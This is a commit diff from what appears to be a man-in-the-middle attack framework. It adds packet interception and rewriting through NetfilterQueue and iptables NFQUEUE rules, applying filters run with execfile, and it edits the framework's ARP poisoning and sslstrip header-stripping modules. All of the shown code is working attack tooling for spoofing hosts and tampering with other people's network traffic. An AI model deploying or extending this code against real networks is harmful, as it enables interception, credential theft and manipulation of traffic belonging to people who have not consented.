This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality)

by using netfilterqueue, you can pass a filter using the new -F option, (will be adding an example later) additionaly removed some deprecated attributes and the --manual-iptables option
2025-08-20 21:43:28 -07:00 · 2015-07-27 20:44:23 +02:00 · 2015-07-27 20:44:23 +02:00 · 7ec9f7b395
commit 7ec9f7b395
parent 0add358a57
17 changed files with 99 additions and 53 deletions
--- a/core/packetparser.py
+++ b/core/packetparser.py
@ -0,0 +1,45 @@
+import threading
+
+from core.utils import set_ip_forwarding, iptables
+from core.logger import logger
+from scapy.all import *
+from traceback import print_exc
+from netfilterqueue import NetfilterQueue
+
+formatter = logging.Formatter("%(asctime)s [PacketParser] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("PacketParser", formatter)
+
+class PacketParser:
+
+    def __init__(self, filter):
+        self.filter = filter
+
+    def start(self):
+        set_ip_forwarding(1)
+        iptables().NFQUEUE()
+
+        self.nfqueue = NetfilterQueue()
+        self.nfqueue.bind(1, self.modify)
+
+        t = threading.Thread(name='packetparser', target=self.nfqueue.run)
+        t.setDaemon(True)
+        t.start()
+
+    def modify(self, pkt):
+        #log.debug("Got packet")
+        data = pkt.get_payload()
+        packet = IP(data)
+
+        try:
+            execfile(self.filter)
+        except Exception:
+            log.debug("Error occurred in filter")
+            print_exc()
+
+        pkt.set_payload(str(packet)) #set the packet content to our modified version
+        pkt.accept() #accept the packet
+
+    def stop(self):
+        self.nfqueue.unbind()
+        set_ip_forwarding(0)
+        iptables().flush()
--- a/core/poisoners/arp/ARPpoisoner.py
+++ b/core/poisoners/arp/ARPpoisoner.py
@ -175,7 +175,7 @@ class ARPpoisoner:

        try:
            targetmac = self.arp_cache[targetip] # see if we already resolved that address
-            log.debug('{} has already been resolved'.format(targetip))
+            #log.debug('{} has already been resolved'.format(targetip))
        except KeyError:
            #This following replaces getmacbyip(), much faster this way
            packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
@ -211,7 +211,7 @@ class ARPpoisoner:

                        if targetmac is not None: 
                            try:
-                                log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
+                                #log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
                                self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
                                self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
                            except Exception as e:
--- a/core/sslstrip/ClientRequest.py
+++ b/core/sslstrip/ClientRequest.py
@ -86,13 +86,15 @@ class ClientRequest(Request):
             del headers['accept-encoding']
             log.debug("Zapped encoding")

-        if 'if-none-match' in headers:
-            del headers['if-none-match']
+        if self.urlMonitor.caching is False:

-        if 'if-modified-since' in headers:
-            del headers['if-modified-since']
+            if 'if-none-match' in headers:
+                del headers['if-none-match']

-        headers['pragma'] = 'no-cache'
+            if 'if-modified-since' in headers:
+                del headers['if-modified-since']
+
+            headers['pragma'] = 'no-cache'

        return headers

--- a/core/sslstrip/URLMonitor.py
+++ b/core/sslstrip/URLMonitor.py
@ -50,6 +50,7 @@ class URLMonitor:
        self.faviconReplacement = False
        self.hsts               = False
        self.app                = False
+        self.caching            = False

    @staticmethod
    def getInstance():
@ -75,6 +76,9 @@ class URLMonitor:
        else:
            return 443

+    def setCaching(self, value):
+        self.caching = value
+
    def addRedirection(self, from_url, to_url):
        for s in self.redirects:
            if from_url in s:
--- a/core/utils.py
+++ b/core/utils.py
@ -64,20 +64,23 @@ def get_mac(interface):

 class iptables:

-    dns  = False
-    http = False
-    smb  = False
+    dns     = False
+    http    = False
+    smb     = False
+    nfqueue = False

    __shared_state = {}
-    
+
    def __init__(self):
        self.__dict__ = self.__shared_state

-    def Flush(self):
+    def flush(self):
        log.debug("Flushing iptables")
        os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
        self.dns  = False
        self.http = False
+        self.smb  = False
+        self.nfqueue = False

    def HTTP(self, http_redir_port):
        log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
@ -93,3 +96,8 @@ class iptables:
        log.debug("Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
        os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
        self.smb = True
+
+    def NFQUEUE(self):
+        log.debug("Setting iptables NFQUEUE rule")
+        os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1')
+        self.nfqueue = True